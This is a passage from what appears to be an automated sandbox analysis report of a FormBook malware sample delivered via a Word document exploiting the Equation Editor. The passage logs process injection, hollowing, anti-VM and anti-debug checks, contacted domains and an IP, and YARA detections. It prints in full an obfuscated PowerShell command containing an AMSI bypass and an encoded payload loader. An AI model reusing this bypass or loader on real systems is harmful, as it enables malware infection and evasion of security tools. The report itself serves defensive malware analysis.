          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000079B7E second address: 0000000000079B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2680Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 800Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2808Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409AB0 rdtsc 11_2_00409AB0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmpBinary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 0000000C.00000000.490369048.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B8F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,13_2_00B8F0D3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B86E5C LoadLibraryA,GetProcAddress,GetLastError,13_2_00B86E5C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B526F8 mov eax, dword ptr fs:[00000030h]11_2_00B526F8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022C0080 mov ecx, dword ptr fs:[00000030h]13_2_022C0080
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022C00EA mov eax, dword ptr fs:[00000030h]13_2_022C00EA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022E26F8 mov eax, dword ptr fs:[00000030h]13_2_022E26F8
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B818C4 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,13_2_00B818C4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409AB0 rdtsc 11_2_00409AB0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0040ACF0 LdrLoadDll,11_2_0040ACF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B81335 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00B81335

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 47.241.96.113 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.foodcartgps.net
          Source: C:\Windows\explorer.exeDomain query: www.milan-sites.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5AJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: B80000Jump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 401000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 7EFDE008Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 1764Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A CJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A CJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"Jump to behavior
          Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Windows\SysWOW64\cscript.exeCode function: GetUserDefaultLCID,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,LoadLibraryExA,lstrlenA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,13_2_00B83030
          Source: C:\Windows\SysWOW64\cscript.exeCode function: GetLocaleInfoW,wcsncmp,13_2_00B941BC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B82FA1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,13_2_00B82FA1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B8386A RegCloseKey,SysFreeString,RegCloseKey,RegCloseKey,RegCloseKey,RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,??2@YAPAXI@Z,??2@YAPAXI@Z,LookupAccountNameW,??3@YAXPAX@Z,ReportEventW,DeregisterEventSource,??3@YAXPAX@Z,??3@YAXPAX@Z,13_2_00B8386A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B8587A GetVersionExA,13_2_00B8587A

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
